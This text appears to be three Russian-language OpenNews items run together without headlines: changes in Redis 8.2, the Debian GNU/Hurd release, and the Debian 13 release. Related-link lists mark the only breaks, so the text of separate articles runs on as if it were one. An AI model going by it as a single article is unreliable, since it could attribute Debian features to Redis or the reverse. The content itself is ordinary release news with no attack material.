Ключевые изменения в Redis 8.2:

• Проведена оптимизация более 70 команд, которые стали работать быстрее, чем в Redis 8.0. Например, команда BITCOUNT стала быстрее на 35%, а команды для операции со списками LINSERT, LREM и LPOS - быстрее на 25%. 17 из оптимизированных команд стали быстрее минимум на 5%, а 52 - минимум на 2%.
  
  
• Проведены оптимизации кода обработки одновременных операций и многопоточного ввода/вывода, позволившие на 49% увеличить число обрабатываемых операций в секунду в тестах c 8 потоками ввода/вывода при распределении нагрузки в 20% запросов на запись и 80% на чтение. На одном сервере удалось превысить рубеж в 1 миллион обрабатываемых операций в секунду.
  
  
• Фундаментально изменён метод хранения данных в формате ключ/значение - для хранения теперь используется унифицированная структура kvobj, позволяющая упаковывать имя ключа, короткое значение и время жизни в одном блоке выделяемой памяти и обойтись одной ссылкой на эту структуру в хэш таблицах, вместо отдельных ссылок на ключи, данные и TTL. При хранении коротких строковых значений новый метод хранение позволил сократить потребление памяти на 25-37%.
  
  
• Проведена оптимизация хранения данных в формате JSON, позволившая снизить потребление памяти на 25-67% при хранении целых чисел и чисел с плавающей запятой.
• В механизм Streams, применяемый для обработки и хранения потока сообщений, добавлены новые команды XACKDEL и XDELEX, упрощающие работу с потоками, к которым подключено несколько получателей (consumer groups). Команды решают задачу удаления сообщения только после того, как его получение будет подтверждено всеми обработчиками.
• В команду BITOP, предназначенную для выполнение битовых операций, добавлены новые логические операторы DIFF, DIFF1, ANDOR и ONE.
• Добавлен новый тип индексов векторов SVS-VAMANA, поддерживающий сжатие векторов.
• Добавлены новые метрики: нагрузка в разрезе отдельных слотов и распределение размеров ключей для базовых типов данных.

1. OpenNews: Уязвимости в СУБД Redis и Valkey
2. OpenNews: Сравнение производительности СУБД Valkey и Redis
3. OpenNews: Проект Redis вернулся на использование открытой лицензии. Представлен Redis 8.0
4. OpenNews: Опубликован Valkey 8.1, форк СУБД Redis от Amazon, Google, Oracle и Ericsson

Debian GNU/Hurd остаётся единственной активно развиваемой платформой Debian, созданной на базе ядра, отличного от Linux (ранее развивался порт Debian GNU/KFreeBSD, но он давно находится в заброшенном состоянии). Платформа GNU/Hurd не входит в число официально поддерживаемых архитектур Debian, поэтому релизы Debian GNU/Hurd формируются отдельно и имеют статус неофициального выпуска Debian.

GNU Hurd представляет собой ядро, развиваемое в качестве замены ядра Unix и оформленное в виде набора серверов, работающих поверх микроядра GNU Mach и реализующих различные системные сервисы, такие как файловые системы, сетевой стек, система управления доступом к файлам. Микроядро GNU Mach предоставляет IPC-механизм, используемый для организации взаимодействия компонентов GNU Hurd и построения распределённой мультисерверной архитектуры.

В новом выпуске:

• Задействована пакетная база дистрибутива Debian 13.
• Реализована полноценная поддержка 64-разрядных систем. Степень поддержки пакетов в 64-разрядной сборке доведена до уровня i386.
• В 64-разрядном окружении задействованы драйверы дисков из NetBSD, работающие в пространстве пользователя и основанные на предложенном проектом NetBSD механизме rump (Runnable Userspace Meta Program).
• Через Rump обеспечена поддержка USB-дисков и CD-ROM.
• По умолчанию задействованы расширенные атрибуты файлов (xattr) для бутстрэппинга из других операционных систем, используя mmdebstrap.
• Для GNU/Hurd портирован Rust.
• Подготовлены пакеты для поддержки SMP.
• В консоли для переключения раскладки клавиатуры задействован xkb.
• Добавлена поддержка acpi, rtc, apic, hpet.

1. OpenNews: В Debian GNU/Hurd обеспечена сборка 71% пакетов Debian
2. OpenNews: Релиз GNU Hurd 0.9
3. OpenNews: Релиз Debian 13

Для загрузки доступны установочные образы, загрузить которые можно по HTTP, jigdo или BitTorrent. Для архитектуры amd64 разработаны LiveUSB, доступные в вариантах с GNOME, KDE, LXDE, Xfce, Cinnamon и MATE, а также многоархитектурный DVD, сочетающий пакеты для платформы amd64 с дополнительными пакетами для архитектуры i386. Перед процедурой миграции с Debian 12 следует ознакомиться со следующим документом.

В репозитории представлено 69830 бинарных пакетов, что на 5411 пакетов больше, чем было предложено в Debian 12. По сравнению с Debian 12 добавлено 14116 новых бинарных пакетов, удалено 8844 (12%) устаревших или заброшенных пакетов, обновлено 44326 (63%) пакетов. Суммарный размер всех предложенных в дистрибутиве исходных текстов составляет 1 463 291 186 строк кода, а размер всех пакетов - 403 GB.

Для 96.9% пакетов обеспечена поддержка воспроизводимых сборок, позволяющих подтвердить, что исполняемый файл собран именно из заявленных исходных текстов и не содержит посторонних изменений, подстановка которых, например, может быть совершена путём атаки на сборочную инфраструктуру или закладки в компиляторе.

Ключевые изменения в Debian 13.0:

• Добавлен официальный порт дистрибутива для систем на базе 64-разрядной архитектуры RISC-V.
• Добавлен порт "loong64" для систем на базе архитектуры набора команд LoongArch, применяемой в процессорах Loongson 3 5000 и реализующей RISC ISA, похожий на MIPS и RISC-V. Порт не включён в число официально поддерживаемых.
• Удалены порты "mipsel" и "mips64el" для систем на базе архитектуры MIPS. Порт "mipsel" был одним из старейших поддерживаемых портов Debian, старше которого только порт для процессоров i386. Причиной удаления стали технические проблемы, такие как ограничение размера памяти в пространстве пользователя в 2Gb и наличие проблем со сборкой.
• Прекращено формирование официальных установочных сборок и пакетов с ядром для 32-разрядных систем x86, но сохранено наличие официально поддерживаемого репозитория пакетов и multi-arch-репозитория, возможности развёртывания 32-разрядных окружений в изолированных контейнерах и инструментария для обеспечения сборки 32-разрядных приложений. Архитектура i386 в Debian теперь ограничивается поддержкой запуска 32-разрядных приложений в 64-разрядном окружении x86_64 (при сборке используются инструкции SSE2, которые недоступны в большинстве 32-разрядных процессоров, поддерживавшихся в Debian 12).
• Полностью решена проблема 2038 года. Все пакеты переведены на использование 64-разрядного типа time_t в портах дистрибутива для 32-разрядных архитектур, в которых продолжал использоваться 32-разрядный тип time_t (не может применяться для обработки времени позднее 19 января 2038 года из-за переполнения счётчика секунд, прошедших после 1 января 1970 года).
• В инсталляторе изменена логика управления разделами EFI, и добавлен режим восстановления систем, установленных в подраздел Btrfs. Исключены прошивки, которые не требуются при установке, не могут работать без несвободных пакетов или бесполезны при текущих настройках ядра. Прекращена поддержка grub-legacy и win32-loader. Возобновлена поддержка использования не-ASCII символов в полном имени пользователя. Добавлена поддержка плат и устройств: Pine64 Pinebook, MNT Reform 2, AM64x HummingBoard-T, Pine64 Star64, Wandboard rev D1, а также ноутбуков и планшетов на базе ARM SoC Snapdragon X Elite.
• В инсталлятор и Live-сборки добавлен режим удалённой загрузки "HTTP Boot", при котором загрузочные образы доставляются при помощи протокола HTTP (URL iso-образа вводится в интерфейсе прошивки UEFI или U-Boot).
• Для хранения каталога со временными файлами /tmp задействована файловая система tmpfs, использующая размещаемый в оперативной памяти RAM-диск, который может быть вытеснен в раздел подкачки при нехватке свободной памяти. Применение tmpfs позволяет сократить число операций записи на физический накопитель, снизить энергопотребление жёстких дисков, продлить жизнь SSD-накопителей, увеличить производительность работы с временными файлами. Для возвращения хранения /tmp в обычной ФС можно использовать команду "systemctl mask tmp.mount".
• Исключены команды last, lastb и lastlog, которые были завязаны на файлы /var/log/wtmp, /var/log/btmp, /var/run/utmp и /var/log/lastlog, использующие 32-разрядный тип time_t, который невозможно заменить на 64-разрядный без изменения ABI Glibc и нарушения совместимости с приложениями. Вместо данных утилит рекомендовано использовать утилиты wtmpdb, lastlog2 и lslogins.
• Для определения и монтирования шифрованных ФС задействован пакет systemd-cryptsetup.
• На системах с архитектурой AMD64 и ARM64 задействованы расширения Intel CET (Control-flow Enforcement Technology), ARM PAC (Pointer Authentication) и BTI (Branch Target Identification) для защиты от эксплоитов, использующих методы возвратно-ориентированного программирования (ROP - Return-Oriented Programming). При использовании техники ROP атакующий не пытается разместить свой код в памяти, а оперирует уже имеющимися в загруженных библиотеках кусками машинных инструкций, завершающихся инструкцией возврата управления (как правило, это окончания библиотечных функций). Работа эксплоита сводится к построению цепочки вызовов подобных блоков ("гаджетов") для получения нужной функциональности. Суть защиты в том, что после передачи управления функции, адреса возврата сохраняются процессором не только в обычном стеке, но и в отдельном теневом стеке, который не может быть изменён напрямую.
• Добавлена поддержка утилиты run0, поставляемой в systemd для выполнения процессов под идентификаторами других пользователей. Утилита реализована в форме надстройки над командой systemd-run и преподносится как более безопасная замена программы sudo.
• Задействована ветка пакетного менеджера APT 3.0, в которой переработан интерфейс пользователя, активирован движок разрешения зависимостей Solver3, добавлена поддержка снапшотов, прекращено использования утилиты apt-key, добавлен крипто-бэкенд для библиотеки OpenSSL и реализована команда 'dist-clean'.
• Добавлена команда debian-repro-status для проверки состояния воспроизводимой сборки для установленных в текущей системе пакетов.
• Завершена миграция дистрибутива с использования отдельного раздела /usr на представление, при котором каталоги /bin, /sbin и /lib* оформлены как символические ссылки на соответствующие каталоги внутри /usr.
• Ядро Linux обновлено до версии 6.12. Задействованы новые выпуски systemd 257, bash 5.2.37, Glibc 2.41, OpenSSL 3.5.
• В состав вошли выпуски сред рабочего стола GNOME 48, KDE Plasma 6.3, LXDE 13, LXQt 2.1.0 и Xfce 4.20. Обновлён графический стек.
• Обновлены пользовательские приложения, например, LibreOffice 25.2. GIMP 3.0.2, Inkscape 1.4, Vim 9.1.
• Обновлены серверные приложения, например, BIND 9.20, Postfix 3.10, Exim 4.98, PostgreSQL 17, MariaDB 11.8, nginx 1.26, OpenJDK 21, OpenSSH 10.0, Samba 4.22, QEMU 10.0, Docker 26.1.5, Xen 4.20.
• Обновлены средства разработки, например, GCC 14.2, LLVM/Clang 19, Perl 5.40, PHP 8.4, Python 3.13, Rust 1.85, Go 1.24.

  1. OpenNews: Релиз Debian 12 "Bookworm"
  2. OpenNews: Разработчики Debian опубликовали заявление, связанное с законопроектом Cyber Resilience Act
  3. OpenNews: Опубликован Droidian 99, вариант Debian для смартфонов
  4. OpenNews: В Live-образах Debian 12 реализована поддержка повторяемых сборок
  5. OpenNews: Проект Debian начал общее голосование по критериям открытости AI-моделей